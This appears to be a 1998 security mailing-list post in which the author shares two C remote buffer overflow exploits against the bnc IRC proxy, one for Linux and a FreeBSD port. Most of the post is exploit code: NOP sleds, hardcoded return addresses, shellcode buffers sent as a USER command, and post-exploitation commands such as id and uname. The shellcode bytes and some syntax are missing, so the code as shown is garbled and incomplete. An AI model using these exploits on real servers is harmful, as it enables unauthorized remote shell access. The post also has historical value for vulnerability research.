bnc exploit

From: duke (dukeat_private)
Date: Sat Dec 26 1998 - 00:36:04 PST

  • Next message: Mark K. Pettit: "Re: Merry Christmas to Sun! (Was: L0pht NFR N-Code Modules"

    i wrote a remote overflow for the "bnc" irc proxy a while back.. its
    pretty much explained in the comments. This was later ported to bsd by
    stranJer, and with his permission i have also included this exploit
    merry xmas everyone :)
    --- vanity.c
       bnc remote buffer overflow for linux x86 (w/o stack-non-exec patch)
       by duke (dukeat_private)
       works on versions < 2.4.4
      offsets: slackware: 0 redhat: 400->1000
      special thanks to stranJer! :)
      greets to everyone (plaguez, horiz0n, dpr, kod, f1ex, sewid, antilove,
    tewl, dmess0r, stranJer  , all of #!ADM :)   and everyone at )
    #include <stdio.h>
    #include <string.h>
    #define RET 0xbffff814
    #define BUFSIZE 2000
    #define LEN 1000
    char shellcode[] =
    main (int argc, char **argv)
      char buf[BUFSIZE];
      int sockfd, i, offset;
      if (argc == 2)
          offset = atoi (argv[1]);
          offset = 0;
      memset (buf, '\x90', BUFSIZE);
      for (i = LEN; i < BUFSIZE - 4; i += 4)
        *(long *) &buf[i] = RET + offset;
      memcpy (buf + (LEN - strlen (shellcode)), shellcode, strlen
      memcpy (buf, "USER ", 5);
      printf ("%s", buf);
    ----obnc_bsd.c by stranJer
       Remote exploit example for bnc (Irc Proxy v2.2.4 by James Seter)
        by duke (dukeat_private)
       32sep98 FreeBSD version by stran9er
       Greet to
    #include <stdio.h>
    #include <string.h>
    #include <sys/types.h>
    #define ADDR  0xefbfd907
    #define RETPTR      1036
    #define BUFSIZE     1041
    #define SHELLOFFSET   23
    char shellcode[] =
    /* added by me dup(0);dup(0) */
    /* generic shellcode */
    void main (int argc, char **argv)
      char buf[BUFSIZE+5];
      unsigned long int addr = ADDR;
      int i;
      if (argc > 1) addr += atoi (argv[1]);
      fprintf (stderr, "Using address: 0x%X\n", addr);
      memset (buf, 0x90, BUFSIZE);
      for (i = RETPTR; i < BUFSIZE - 4; i += 4)
        *(long *) &buf[i] = addr;
      memcpy (buf + (RETPTR - sizeof(shellcode)) - SHELLOFFSET,
        shellcode, strlen (shellcode));
      printf ("%s/usr/bin/uname -a\n/usr/bin/id\n/bin/pwd\n", buf);
    /* segodna: 23 sentabra 1998 goda */

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